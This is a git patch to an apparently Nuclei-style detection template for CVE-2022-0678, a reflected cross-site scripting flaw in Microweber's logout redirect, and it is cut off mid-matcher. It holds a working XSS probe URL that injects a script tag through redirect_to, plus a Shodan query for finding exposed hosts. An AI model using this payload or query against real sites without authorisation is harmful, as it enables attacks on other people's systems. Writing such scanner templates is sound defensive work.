From 26bc2b6c1c37962d80e96e85dd57ae9c8cb98524 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 15 Sep 2022 12:58:05 +0530 Subject: [PATCH] Update CVE-2022-0678.yaml --- cves/2022/CVE-2022-0678.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/cves/2022/CVE-2022-0678.yaml b/cves/2022/CVE-2022-0678.yaml index aa809fe09e..96cb86e001 100644 --- a/cves/2022/CVE-2022-0678.yaml +++ b/cves/2022/CVE-2022-0678.yaml @@ -1,32 +1,34 @@ id: CVE-2022-0678 info: - name: Microweber Cross-Site Scripting + name: Microweber < 1.2.11- Cross-Site Scripting author: tess severity: medium description: | - Can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out. + Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out. reference: - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/ - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg - https://nvd.nist.gov/vuln/detail/CVE-2022-0678 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0678 + classification: + cve-id: CVE-2022-0678 metadata: verified: true shodan-query: http.favicon.hash:780351152 - tags: xss,microweber + tags: cve,cve2022,xss,microweber requests: - method: GET path: - - '{{BaseURL}}/demo/api/logout?redirect_to=/asdf">' + - '{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - - '>